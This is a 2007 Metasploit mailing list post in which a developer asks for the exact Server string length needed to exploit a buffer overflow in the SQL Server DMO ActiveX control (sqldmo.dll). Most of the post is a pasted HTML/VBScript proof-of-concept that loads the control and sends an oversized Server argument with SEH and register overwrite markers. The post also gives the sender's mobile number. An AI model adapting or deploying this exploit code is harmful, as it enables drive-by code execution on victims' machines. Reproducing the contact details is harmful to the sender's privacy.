Metasploit mailing list archives
Microsoft SQL Server Distributed Management Objects OLE DLL
From: manish.gupta at ariosesoftware.com (Manish Gupta)
Date: Fri, 14 Sep 2007 09:17:40 +0530
Hi, I want to know the Server string length for the Microsoft SQL Server Distributed Management Objects OLE DLL, which was published on 7th of Sept. 2007. I am working on the "Microsoft SQL Server Distributed Management Objects OLE DLL for SQL Enterprise Manager (sqldmo.dll) remote buffer overflow" vulnerability, whose exploit is:

<html>
<object classid='clsid:10020200-E260-11CF-AE68-00AA004A34D5' id='SQLServer' /></object>
<script language='vbscript'>
targetFile = "C:\Programmi\Microsoft SQL Server\80\Tools\Binn\sqldmo.dll"
prototype = "Sub Start ( ByVal StartMode As Boolean , [ ByVal Server As Variant ] , [ ByVal Login As Variant ] , [ ByVal Password As Variant ] )"
memberName = "Start"
progid = "SQLDMO.SQLServer"
argCount = 4
'edx = ecx
edx ="bb"
seh ="aa"
StartMode =True
Server ="http://ZZZZ\YYYY\XXXX\WW?W\VVVV\AAAA\AAA\AAAAA\AAAA\AA at AA\tes\test\test\te s.\ttest\MMMM\LLLL\KKK\JJJJ\IIII\HH.H\GGGGG\FFFF\EEEE\DDD\CCCC\BBBB\AAA\A\\\ \\\\\\:#$%AAAA\BBBB\CCCC\DD?D\EEEE\FFFF\GGG\\:#$%\HHHHH\IIII\te at st\tes\test\ test\tes.aaaabbbbccccddddeeeeffffgggghhhhiiiiaaaaaaa" + seh + "CCDmmm" + edx + "nnnBBBB\AAAA\ZZZ\Z\\\\\\\\\:#$%YYYY\XXXX\WWWW\VV?V\UUUU\TTTT\SSS\\:#$%\RRRR R\QQQQ\PP at PP\OOO\NNNN\MMMM\LLL.\KKKKK\JJJJ\IIII\HHH\GGGG\FFFF\EE.E\DDDDD\CCC C\BBBB\AAA\AAAA\AAAA\AAA\A\\\\\\\\\:#$%AAAA\AAAA\AAAA\AA?A\wwww\vvvv\uuu\\:# $%\ttttt\ssss\rr at rr\qqq\pppp\oooo\nnn.\mmmmm\llll\kkkk\jjj\iiii\hhhh\gg.g\ff fff\eeee\dddd\ccc\bbbb\aaaa\AAA\A\\\\\\\"
Login ="aaaaaaaa"
Password ="bbbbbbbb"
SQLServer.Start StartMode ,Server ,Login ,Password
</script>
</html>

I am not able to find the server length, so please help me.

Regards
Manish Gupta
Ariose Software
Noida (U.P)
Mbl:-+91-9891650667